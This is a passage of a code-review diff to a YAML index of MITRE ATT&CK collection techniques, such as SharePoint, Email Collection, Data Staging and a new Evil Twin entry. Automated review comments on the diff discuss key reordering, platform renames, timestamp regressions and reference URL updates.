x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1602:
@@ -39122,7 +39595,7 @@ collection:
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:32:58.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Configuration Repository
x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39137,30 +39610,10 @@ collection:
- 'Network Traffic: Network Connection Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.002:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- created: '2020-02-14T13:35:32.938Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Sharepoint
description: |
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
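Review bot: almost all of this hunk is key reordering rather than content change: `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`/`type`/`created` and `external_references` for T1213.002 are removed here and re-added lower in the object, with the only substantive change being `modified` 2022-04-25 to 2024-10-14. The same pattern appears for T1102, T1001.003 and T1025. Emitting keys in a fixed, sorted order from the generator would make regeneration diffs show only real field changes and would have kept this PR reviewable at a glance.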
@@ -39169,13 +39622,17 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
@@ -39189,20 +39646,37 @@ collection:
of programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'Cloud Service: Cloud Service Metadata'
+ type: attack-pattern
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ created: '2020-02-14T13:35:32.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/002
+ external_id: T1213.002
+ - source_name: Microsoft SharePoint Logging
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
T1123:
technique:
- modified: '2024-01-23T22:53:18.389Z'
+ modified: '2024-10-15T13:39:22.774Z'
name: Audio Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
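Review bot: the T1213.002 platform list changes from "Office 365" to "Office Suite", and a new data source `'Cloud Service: Cloud Service Metadata'` is added, with `x_mitre_version` 1.0 to 1.1 and `x_mitre_attack_spec_version` 3.2.0 added in the preceding lines, which is internally consistent. The platform rename is the part that needs follow-up: any index file or filter keyed on the literal platform string "Office 365" will no longer match this technique, so check that the per-platform indexes are regenerated (and, if they are named after the platform, renamed) in this change.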
@@ -39245,7 +39719,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1123
atomic_tests: []
T1560.003:
@@ -39270,7 +39743,7 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T22:48:14.605Z'
name: Archive via Custom Method
description: 'An adversary may compress or encrypt data that is collected prior
to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39290,22 +39763,24 @@ collection:
x_mitre_data_sources:
- 'File: File Creation'
- 'Script: Script Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1114:
technique:
- modified: '2023-09-29T21:06:03.098Z'
+ modified: '2024-10-15T12:24:27.627Z'
name: Email Collection
description: 'Adversaries may target user email to collect sensitive information.
Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
+ that can prove valuable to adversaries. Emails may also contain details of
+ ongoing incident response operations, which may allow adversaries to adjust
+ their techniques in order to maintain persistence or evade defenses.(Citation:
+ TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+ can collect or forward email from mail servers or clients. '
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
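Review bot: the extended T1114 description introduces two new citation keys, `(Citation: TrustedSec OOB Communications)` and `(Citation: CISA AA20-352A 2021)`; both need matching `source_name` entries under `external_references`, and the later lines of this object do add them, so the cross-references resolve. Minor: the single-quoted description still ends with a trailing space before the closing quote (`clients. '`), carried over from upstream; if the generator ever normalizes whitespace it will show up as a spurious diff here.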
@@ -39322,11 +39797,10 @@ collection:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '2.5'
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
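Review bot: this hunk removes both "Office 365" and "Google Workspace" from the T1114 platform list and adds only "Office Suite", with the version bump 2.5 to 2.6. Dropping "Google Workspace" outright means any Google Workspace-specific index will lose T1114 entirely, so please confirm this reflects the upstream platform consolidation rather than a lossy export, and state it in the commit message, since the resulting index change is not obvious from the YAML diff alone.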
@@ -39342,37 +39816,28 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1114
external_id: T1114
+ - source_name: CISA AA20-352A 2021
+ description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+ of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+ Retrieved August 30, 2024.
+ url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
Retrieved October 8, 2019.
url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ - source_name: TrustedSec OOB Communications
+ description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+ Out-of-Band Communications are Essential for Incident Response. Retrieved
+ August 30, 2024.'
+ url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1025:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - William Cain
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- type: attack-pattern
- created: '2017-05-31T21:30:31.584Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:30:50.936Z'
name: Data from Removable Media
description: "Adversaries may search connected removable media on computers
they have compromised to find files of interest. Sensitive data can be collected
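Review bot: the deletion of the whole T1025 header block (x_mitre_platforms through external_references) at the end of this hunk is only safe because the same keys are re-emitted lower in the object in the next hunk; no value changes for those keys, but the serializer's unstable key order turns a spec-version bump into a 60-line diff and buries the real change here, the two new CISA and TrustedSec reference entries. If the generator can be pinned to a fixed key order, future regenerations will diff cleanly. The two new entries are well-formed and their source_name values match the citation keys in the description exactly.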
@@ -39384,75 +39849,93 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - William Cain
+ x_mitre_deprecated: false
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
x_mitre_system_requirements:
- Privileges to access removable media drive and files
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created: '2017-05-31T21:30:31.584Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1025
atomic_tests: []
T1074.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Massimiliano Romano, BT Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- - source_name: Prevailion DarkWatchman 2021
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
- description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
- new evolution in fileless techniques. Retrieved January 10, 2022.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:28:39.920Z'
+ name: 'Data Staged: Local Data Staging'
description: |-
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Data Staged: Local Data Staging'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Massimiliano Romano, BT Security
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ created: '2020-03-13T21:13:10.467Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/001
+ external_id: T1074.001
+ - source_name: Prevailion DarkWatchman 2021
+ description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+ new evolution in fileless techniques. Retrieved January 10, 2022.'
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1074.001
atomic_tests: []
T1114.001:
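Review bot: the Prevailion DarkWatchman reference URL is switched to a web.archive.org snapshot while its description still reads 'Retrieved January 10, 2022'; that is acceptable if the snapshot (timestamp 20220629230035 in the URL) captures the content originally cited, but the DHCP reference later in this patch updates the retrieval date when it moves to an archive URL, and the two should be handled the same way. For T1025 the visible changes are only the added revoked: false, the x_mitre_attack_spec_version bump 2.1.0 -> 3.2.0 and a newer modified timestamp with x_mitre_version left at '1.2', which is consistent since no content changed; T1074.001 likewise keeps x_mitre_version '1.1'.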
@@ -39479,7 +39962,7 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T17:59:20.983Z'
name: 'Email Collection: Local Email Collection'
description: |-
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
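Review bot: the modified timestamp for T1114.001 moves backwards, from 2021-04-29T14:49:39.188Z to 2020-03-24T17:59:20.983Z. A regenerated file should carry timestamps equal to or newer than what is committed; a regression suggests either that the previous value came from a bulk-stamped edition of the upstream data or that the source bundle used here is older than the one used last time. The same regression appears later in this patch for T1005, T1560.002, T1602.002, T1185, T1557.001 and T1125, and all of the old values share the .188Z millisecond suffix, which looks like a bulk stamp rather than an individual edit; please confirm which upstream bundle was used before merging.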
@@ -39503,13 +39986,11 @@ collection:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1114.001
atomic_tests: []
T1119:
technique:
- modified: '2024-01-02T13:35:57.680Z'
+ modified: '2024-09-25T20:40:07.791Z'
name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
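Review bot: T1114.001 loses both spec_version: '2.1' and x_mitre_attack_spec_version: 2.1.0 here and no x_mitre_attack_spec_version: 3.2.0 is added in either of its hunks, whereas T1025, T1074.001, T1074.002, T1557.003 and T1213.001 in this patch all receive a 3.2.0 line when the 2.1.0 one is dropped. Confirm the key exists elsewhere in the T1114.001 object outside the hunk context; otherwise it becomes an object with no spec version at all.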
@@ -39530,6 +40011,7 @@ collection:
phase_name: collection
x_mitre_contributors:
- Praetorian
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Depending on the method used, actions could include common
file system commands and parameters on the command-line interface within batch
@@ -39553,8 +40035,10 @@ collection:
- Windows
- IaaS
- SaaS
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
+ - 'User Account: User Account Authentication'
- 'Command: Command Execution'
- 'File: File Access'
- 'Script: Script Execution'
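Review bot: adding 'Office Suite' to x_mitre_platforms for T1119 matches the T1114 and T1530 changes, but this hunk's context only shows Windows, IaaS and SaaS; check that any 'Office 365' or 'Google Workspace' entries above the context window were removed as they were for T1114, otherwise T1119 ends up declaring both the old and the new platform names. The new 'User Account: User Account Authentication' data source together with the platform change justifies the 1.2 -> 1.3 bump.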
@@ -39579,7 +40063,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1119
atomic_tests: []
T1115:
@@ -39646,12 +40129,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1115
atomic_tests: []
T1530:
technique:
- modified: '2023-09-29T16:11:43.530Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Data from Cloud Storage Object
description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -39685,10 +40167,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
- Praetorian
- AppOmni
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
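Review bot: x_mitre_attack_spec_version: 3.2.0 is inserted directly after kill_chain_phases for T1530, while for T1025, T1074.001 and T1074.002 in this same patch the generator places it after object_marking_refs, next to x_mitre_modified_by_ref; both positions parse identically, but the inconsistency is exactly what produces the remove-at-the-tail, add-near-the-head churn visible further down for this object. The added contributor line is fine.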
@@ -39699,13 +40183,14 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Metadata'
- 'Cloud Storage: Cloud Storage Access'
type: attack-pattern
id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -39746,37 +40231,11 @@ collection:
url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1530
atomic_tests: []
T1074.002:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- created: '2020-03-13T21:14:58.206Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Remote Data Staging
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -39787,23 +40246,47 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Creation'
- 'Command: Command Execution'
- 'File: File Access'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ created: '2020-03-13T21:14:58.206Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/002
+ external_id: T1074.002
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:54:39.466Z'
name: Data from Local System
description: |
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
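Review bot: the Mandiant M-Trends 2020 URL moves from content.fireeye.com to a mandiant.com PDF while the description still reads 'Retrieved April 24, 2020'; as with the DarkWatchman reference, either re-verify and update the retrieval date or leave the URL alone, so that retrieval-date handling is consistent across the patch. T1074.002 also has no identifier: T1074.002 line before atomic_tests, unlike T1025 and T1074.001 which carry identifier:; that is pre-existing rather than introduced here, but worth a follow-up if anything indexes on that key. The T1005 modified value below regresses from 2023-05-09 to 2023-04-12 and needs the same source-bundle confirmation as T1114.001.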
@@ -39873,7 +40356,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1005
atomic_tests: []
T1560.002:
@@ -39908,7 +40390,7 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T18:27:30.891Z'
name: 'Archive Collected Data: Archive via Library'
description: |-
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -39927,10 +40409,89 @@ collection:
x_mitre_data_sources:
- 'Script: Script Execution'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1560.002
atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
